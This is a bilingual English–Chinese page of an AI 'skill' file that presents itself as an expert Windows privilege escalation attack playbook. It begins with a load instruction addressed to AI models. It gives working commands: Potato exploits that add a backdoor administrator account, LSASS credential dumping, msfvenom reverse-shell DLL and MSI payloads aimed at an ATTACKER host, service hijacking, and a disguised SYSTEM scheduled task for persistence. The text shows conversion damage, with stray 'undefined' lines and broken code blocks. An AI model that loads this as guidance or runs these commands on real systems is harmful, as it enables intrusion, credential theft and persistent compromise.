windows-privilege-escalation

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Windows Local Privilege Escalation — Expert Attack Playbook

SKILL: Windows本地权限提升 —— 专家级攻击手册

AI LOAD INSTRUCTION: Expert Windows privesc techniques. Covers token manipulation, Potato family, service misconfigurations, DLL hijacking, AlwaysInstallElevated, scheduled task abuse, registry autoruns, and named pipe impersonation. Base models miss nuanced privilege prerequisites and OS-version-specific constraints.

AI加载说明：专家级Windows提权技术，涵盖令牌操作、Potato系列漏洞、服务配置错误、DLL劫持、AlwaysInstallElevated、计划任务滥用、注册表自动运行项和命名管道模拟。基础模型缺少细致的权限前提条件和特定操作系统版本的约束。

0. RELATED ROUTING

0. 相关跳转指引

Before going deep, consider loading:

windows-lateral-movement after escalation for pivoting to other hosts
windows-av-evasion when AV/EDR blocks your privesc tools
active-directory-kerberos-attacks when the host is domain-joined and you need AD-level escalation
active-directory-acl-abuse for domain privilege escalation via ACL misconfigurations

深入学习前，你可以考虑加载以下内容：

提权完成后加载windows-lateral-movement，用于横向移动到其他主机
当AV/EDR拦截你的提权工具时加载windows-av-evasion
当主机加入了域且你需要AD级别的提权时加载active-directory-kerberos-attacks
如需通过ACL配置错误实现域权限提升，加载active-directory-acl-abuse

Advanced Reference

高级参考资料

Also load TOKEN_POTATO_TRICKS.md when you need:

Detailed Potato family comparison (JuicyPotato → GodPotato evolution)
OS-version-specific exploit selection
Required privileges and protocol details per variant

Also load UAC_BYPASS_METHODS.md when you need:

UAC bypass technique matrix (fodhelper, eventvwr, sdclt, etc.)
Auto-elevate binary abuse
Mock trusted directory tricks

当你需要以下内容时，还可以加载TOKEN_POTATO_TRICKS.md：

Potato系列漏洞详细对比（JuicyPotato → GodPotato演进路线）
特定操作系统版本的漏洞选择方案
各变体所需的权限和协议细节

当你需要以下内容时，还可以加载UAC_BYPASS_METHODS.md：

UAC绕过技术矩阵（fodhelper、eventvwr、sdclt等）
自动提升权限二进制文件滥用
模拟受信任目录技巧

1. ENUMERATION CHECKLIST

1. 枚举检查清单

System Context

系统上下文

cmd

whoami /all                        & REM Current user, groups, privileges
systeminfo                         & REM OS version, hotfixes, architecture
hostname                           & REM Machine name
net user %USERNAME%                & REM Group memberships

cmd

whoami /all                        & REM Current user, groups, privileges
systeminfo                         & REM OS version, hotfixes, architecture
hostname                           & REM Machine name
net user %USERNAME%                & REM Group memberships

Token Privileges (Critical)

令牌权限（关键）

cmd

whoami /priv

Privilege	Escalation Path
`SeImpersonatePrivilege`	Potato family exploits (§2)
`SeAssignPrimaryTokenPrivilege`	Token manipulation, Potato variants
`SeDebugPrivilege`	Dump LSASS, inject into SYSTEM processes
`SeBackupPrivilege`	Read any file (SAM/SYSTEM/NTDS.dit)
`SeRestorePrivilege`	Write any file (DLL hijack, service binary)
`SeTakeOwnershipPrivilege`	Take ownership of any object
`SeLoadDriverPrivilege`	Load vulnerable kernel driver → kernel exploit

cmd

whoami /priv

权限	提权路径
`SeImpersonatePrivilege`	Potato系列漏洞利用（§2）
`SeAssignPrimaryTokenPrivilege`	令牌操作、Potato变体漏洞
`SeDebugPrivilege`	转储LSASS、注入SYSTEM进程
`SeBackupPrivilege`	读取任意文件（SAM/SYSTEM/NTDS.dit）
`SeRestorePrivilege`	写入任意文件（DLL劫持、服务二进制文件）
`SeTakeOwnershipPrivilege`	获取任意对象的所有权
`SeLoadDriverPrivilege`	加载存在漏洞的内核驱动 → 内核漏洞利用

Services & Scheduled Tasks

服务与计划任务

cmd

sc query state= all                & REM All services
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
schtasks /query /fo LIST /v        & REM Verbose scheduled task list

cmd

sc query state= all                & REM All services
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
schtasks /query /fo LIST /v        & REM Verbose scheduled task list

Installed Software & Patches

已安装软件与补丁

cmd

wmic product get name,version
wmic qfe list                      & REM Installed patches

cmd

wmic product get name,version
wmic qfe list                      & REM Installed patches

Network & Credentials

网络与凭证

cmd

netstat -ano                       & REM Listening ports + PIDs
cmdkey /list                       & REM Stored credentials
dir C:\Users\*\AppData\Local\Microsoft\Credentials\*
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul

cmd

netstat -ano                       & REM Listening ports + PIDs
cmdkey /list                       & REM Stored credentials
dir C:\Users\*\AppData\Local\Microsoft\Credentials\*
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul

2. TOKEN MANIPULATION & POTATO EXPLOITS

2. 令牌操作与Potato漏洞利用

SeImpersonatePrivilege Abuse

SeImpersonatePrivilege滥用

Service accounts (IIS AppPool, MSSQL, etc.) typically hold

SeImpersonatePrivilege

. This enables impersonation of any token presented to you.

Tool	OS Support	Protocol	Notes
JuicyPotato	Win7–Server2016	COM/DCOM	Requires valid CLSID; patched on Server2019+
RoguePotato	Server2019+	OXID resolver redirect	Needs controlled machine on port 135
PrintSpoofer	Win10/Server2016-2019	Named pipe via Print Spooler	Simple, fast; Spooler must run
SweetPotato	Broad	COM + Print + EFS	Combines multiple techniques
GodPotato	Win8–Server2022	DCOM RPCSS	Works on latest patched systems

cmd

undefined

服务账号（IIS AppPool、MSSQL等）通常持有

SeImpersonatePrivilege

，支持模拟发送给你的任意令牌。

工具	支持的操作系统	协议	说明
JuicyPotato	Win7–Server2016	COM/DCOM	需要有效的CLSID；Server2019+版本已修复
RoguePotato	Server2019+	OXID解析器重定向	需要控制135端口上的机器
PrintSpoofer	Win10/Server2016-2019	通过打印假脱机程序的命名管道	简单快速；需要Spooler服务运行
SweetPotato	适配范围广	COM + Print + EFS	整合了多种技术
GodPotato	Win8–Server2022	DCOM RPCSS	支持最新的已打补丁系统

cmd

undefined

PrintSpoofer (simplest for modern systems)

PrintSpoofer (现代系统最简单的方案)

PrintSpoofer64.exe -i -c "cmd /c whoami"

GodPotato (broadest compatibility)

GodPotato (兼容性最广)

GodPotato.exe -cmd "cmd /c net user hacker P@ss123 /add && net localgroup administrators hacker /add"

JuicyPotato (legacy systems)

JuicyPotato ( legacy系统)

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * -c {CLSID}

undefined

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * -c {CLSID}

undefined

SeDebugPrivilege Abuse

SeDebugPrivilege滥用

powershell

undefined

powershell

undefined

Dump LSASS (if SeDebugPrivilege is enabled)

转储LSASS (如果SeDebugPrivilege已启用)

procdump -ma lsass.exe lsass.dmp

Or migrate into a SYSTEM process

或者迁移到SYSTEM进程中

Meterpreter: migrate to winlogon.exe / services.exe

Meterpreter: 迁移到 winlogon.exe / services.exe

---

---

3. SERVICE MISCONFIGURATIONS

3. 服务配置错误

Unquoted Service Paths

未加引号的服务路径

cmd

undefined

cmd

undefined

Find unquoted paths with spaces

查找带空格的未加引号路径

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\" | findstr /i /v """


If path is `C:\Program Files\My App\service.exe`, Windows tries:
1. `C:\Program.exe`
2. `C:\Program Files\My.exe`
3. `C:\Program Files\My App\service.exe`

Place malicious binary at first writable location.

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\" | findstr /i /v """


如果路径是`C:\Program Files\My App\service.exe`，Windows会按以下顺序尝试执行：
1. `C:\Program.exe`
2. `C:\Program Files\My.exe`
3. `C:\Program Files\My App\service.exe`

将恶意二进制文件放在第一个可写入的位置即可。

Weak Service Permissions

服务权限过弱

cmd

undefined

cmd

undefined

Check service ACL with accesschk (Sysinternals)

使用accesschk（Sysinternals工具）检查服务ACL

accesschk64.exe -wuvc * /accepteula

Look for: SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS

查找: SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS


```cmd


```cmd

Reconfigure service to run attacker binary

重新配置服务运行攻击者的二进制文件

sc config vuln_svc binpath= "C:\temp\rev.exe" sc stop vuln_svc sc start vuln_svc

undefined

sc config vuln_svc binpath= "C:\temp\rev.exe" sc stop vuln_svc sc start vuln_svc

undefined

Writable Service Binaries

可写入的服务二进制文件

cmd

undefined

cmd

undefined

Check if current user can write to the service binary path

检查当前用户是否有权限写入服务二进制文件路径

icacls "C:\Program Files\VulnApp\service.exe"

(F) = Full, (M) = Modify, (W) = Write → replace binary

(F) = 完全权限, (M) = 修改权限, (W) = 写入权限 → 替换二进制文件即可

---

---

4. DLL HIJACKING

4. DLL劫持

DLL Search Order (Standard)

DLL搜索顺序（标准）

Directory of the executable
```
C:\Windows\System32
```
```
C:\Windows\System
```
```
C:\Windows
```
Current directory
Directories in
```
%PATH%
```

可执行文件所在目录
```
C:\Windows\System32
```
```
C:\Windows\System
```
```
C:\Windows
```
当前目录
```
%PATH%
```
中的目录

Exploitation

漏洞利用

cmd

undefined

cmd

undefined

Find missing DLLs (use Process Monitor)

查找缺失的DLL（使用Process Monitor）

Filter: Result=NAME NOT FOUND, Path ends with .dll

筛选条件: Result=NAME NOT FOUND, Path ends with .dll

Compile malicious DLL

编译恶意DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll > evil.dll

Place in writable directory that comes before the real DLL location

放在真实DLL位置之前的可写入目录中

undefined

undefined

Known Phantom DLL Targets

常见的幻影DLL目标

Application	Missing DLL	Drop Location
Various .NET apps	`profapi.dll`	Application directory
Windows services	`wlbsctrl.dll`	`%PATH%` writable dir
Third-party updaters	`VERSION.dll`	Application directory

应用	缺失的DLL	放置位置
各类.NET应用	`profapi.dll`	应用目录
Windows服务	`wlbsctrl.dll`	`%PATH%` 可写入目录
第三方更新程序	`VERSION.dll`	应用目录

5. ALWAYSINSTALLELEVATED

cmd

undefined

cmd

undefined

Check both registry keys — BOTH must be set to 1

检查两个注册表项 —— 两个都必须设置为1

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated


```cmd

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated


```cmd

Generate MSI payload

生成MSI payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi > evil.msi msiexec /quiet /qn /i evil.msi

---

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi > evil.msi msiexec /quiet /qn /i evil.msi

---

6. SCHEDULED TASK ABUSE

6. 计划任务滥用

cmd

undefined

cmd

undefined

Enumerate tasks with writable scripts or missing binaries

枚举带有可写入脚本或缺失二进制文件的任务

schtasks /query /fo LIST /v | findstr /i "Task To Run|Run As User|Schedule Type"

Check permissions on task binary

检查任务二进制文件的权限

icacls "C:\path\to\task\binary.exe"

If writable: replace binary, wait for task execution

如果可写入: 替换二进制文件，等待任务执行

If missing: place your binary at the expected path

如果缺失: 将你的二进制文件放在预期路径下

undefined

undefined

Scheduled Task via PowerShell

通过PowerShell创建计划任务

powershell

undefined

powershell

undefined

If you can create tasks (unlikely from low priv, useful post-UAC-bypass)

如果你有权限创建任务（低权限下很少见，UAC绕过之后有用）

$action = New-ScheduledTaskAction -Execute "C:\temp\rev.exe" $trigger = New-ScheduledTaskTrigger -AtLogon Register-ScheduledTask -TaskName "Updater" -Action $action -Trigger $trigger -User "SYSTEM"

---

$action = New-ScheduledTaskAction -Execute "C:\temp\rev.exe" $trigger = New-ScheduledTaskTrigger -AtLogon Register-ScheduledTask -TaskName "Updater" -Action $action -Trigger $trigger -User "SYSTEM"

---

7. REGISTRY AUTORUNS

7. 注册表自动运行项

cmd

undefined

cmd

undefined

Check writable autorun locations

检查可写入的自动运行位置

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Check permissions with accesschk

使用accesschk检查权限

accesschk64.exe -wvu "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /accepteula


If an autorun entry points to a writable path → replace binary or inject new entry.

---

accesschk64.exe -wvu "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /accepteula


如果自动运行项指向可写入路径 → 替换二进制文件或者注入新的条目即可。

---

8. NAMED PIPE IMPERSONATION

8. 命名管道模拟

powershell

undefined

powershell

undefined

Service account creates a named pipe, tricks a SYSTEM process into connecting

服务账号创建命名管道，诱骗SYSTEM进程连接

The connecting client's token is then impersonated

之后就可以模拟连接客户端的令牌

PrintSpoofer leverages this with the Print Spooler:

PrintSpoofer通过打印假脱机程序利用该特性:

PrintSpoofer64.exe -i -c powershell.exe


Custom named pipe server (requires SeImpersonatePrivilege):
```powershell

PrintSpoofer64.exe -i -c powershell.exe


自定义命名管道服务器（需要SeImpersonatePrivilege）:
```powershell

Create pipe → coerce SYSTEM connection → ImpersonateNamedPipeClient() → SYSTEM token

创建管道 → 强制SYSTEM连接 → ImpersonateNamedPipeClient() → 获取SYSTEM令牌

---

---

9. AUTOMATED TOOLS

9. 自动化工具

Tool	Purpose	Command
winPEAS	Comprehensive Windows enumeration	`winPEASx64.exe`
PowerUp	Service/DLL/registry misconfig checks	`Invoke-AllChecks`
Seatbelt	Security-focused host survey	`Seatbelt.exe -group=all`
SharpUp	C# port of PowerUp checks	`SharpUp.exe audit`
PrivescCheck	PowerShell privesc checker	`Invoke-PrivescCheck`
BeRoot	Common misconfig finder	`beRoot.exe`

工具	用途	命令
winPEAS	全面的Windows枚举	`winPEASx64.exe`
PowerUp	服务/DLL/注册表配置错误检查	`Invoke-AllChecks`
Seatbelt	聚焦安全的主机调查	`Seatbelt.exe -group=all`
SharpUp	PowerUp检查的C#移植版本	`SharpUp.exe audit`
PrivescCheck	PowerShell提权检查器	`Invoke-PrivescCheck`
BeRoot	常见配置错误查找工具	`beRoot.exe`

10. PRIVILEGE ESCALATION DECISION TREE

10. 权限提升决策树

Low-privilege shell on Windows
│
├── whoami /priv → SeImpersonatePrivilege?
│   ├── Yes → Potato family (§2)
│   │   ├── Server2019+/Win11 → GodPotato or PrintSpoofer
│   │   ├── Server2016/Win10 → PrintSpoofer or SweetPotato
│   │   └── Older → JuicyPotato (need CLSID)
│   └── SeDebugPrivilege? → LSASS dump / process injection
│
├── Service misconfigurations?
│   ├── Unquoted path with spaces + writable dir? → binary plant (§3)
│   ├── SERVICE_CHANGE_CONFIG on service? → reconfigure binpath (§3)
│   └── Writable service binary? → replace executable (§3)
│
├── DLL hijacking opportunity?
│   ├── Missing DLL in search path? → plant malicious DLL (§4)
│   └── Writable directory in %PATH%? → DLL plant (§4)
│
├── AlwaysInstallElevated set?
│   └── Both HKLM+HKCU = 1 → MSI payload (§5)
│
├── Scheduled task abuse?
│   ├── Task runs as SYSTEM with writable binary? → replace (§6)
│   └── Task references missing binary? → plant binary (§6)
│
├── Registry autorun writable?
│   └── Writable binary path → replace on next login/reboot (§7)
│
├── UAC bypass needed? (medium integrity → high integrity)
│   └── Load UAC_BYPASS_METHODS.md
│
├── Stored credentials?
│   ├── cmdkey /list → runas /savecred
│   ├── Autologon in registry? → plaintext creds
│   └── WiFi passwords, browser creds, DPAPI
│
└── None of the above?
    ├── Run winPEAS for comprehensive scan
    ├── Check internal services (netstat -ano)
    ├── Look for sensitive files (unattend.xml, web.config, *.config)
    └── Check for kernel exploits (systeminfo → Windows Exploit Suggester)

Windows低权限shell
│
├── whoami /priv → 存在SeImpersonatePrivilege?
│   ├── 是 → Potato系列漏洞（§2）
│   │   ├── Server2019+/Win11 → GodPotato 或 PrintSpoofer
│   │   ├── Server2016/Win10 → PrintSpoofer 或 SweetPotato
│   │   └── 更旧版本 → JuicyPotato (需要CLSID)
│   └── 存在SeDebugPrivilege? → 转储LSASS / 进程注入
│
├── 存在服务配置错误?
│   ├── 带空格的未加引号路径 + 可写入目录? → 放置二进制文件（§3）
│   ├── 服务有SERVICE_CHANGE_CONFIG权限? → 重新配置binpath（§3）
│   └── 服务二进制文件可写入? → 替换可执行文件（§3）
│
├── 存在DLL劫持机会?
│   ├── 搜索路径中存在缺失的DLL? → 放置恶意DLL（§4）
│   └── %PATH%中有可写入目录? → 放置DLL（§4）
│
├── AlwaysInstallElevated已设置?
│   └── HKLM+HKCU都为1 → 运行MSI payload（§5）
│
├── 存在计划任务滥用可能?
│   ├── 任务以SYSTEM运行且二进制文件可写入? → 替换（§6）
│   └── 任务引用的二进制文件缺失? → 放置二进制文件（§6）
│
├── 注册表自动运行项可写入?
│   └── 二进制文件路径可写入 → 下次登录/重启时替换（§7）
│
├── 需要UAC绕过? (中完整性 → 高完整性)
│   └── 加载UAC_BYPASS_METHODS.md
│
├── 存在存储的凭证?
│   ├── cmdkey /list → runas /savecred
│   ├── 注册表中有自动登录配置? → 明文凭证
│   └── WiFi密码、浏览器凭证、DPAPI
│
└── 以上都不满足?
    ├── 运行winPEAS进行全面扫描
    ├── 检查内部服务（netstat -ano）
    ├── 查找敏感文件（unattend.xml, web.config, *.config）
    └── 检查内核漏洞（systeminfo → Windows Exploit Suggester）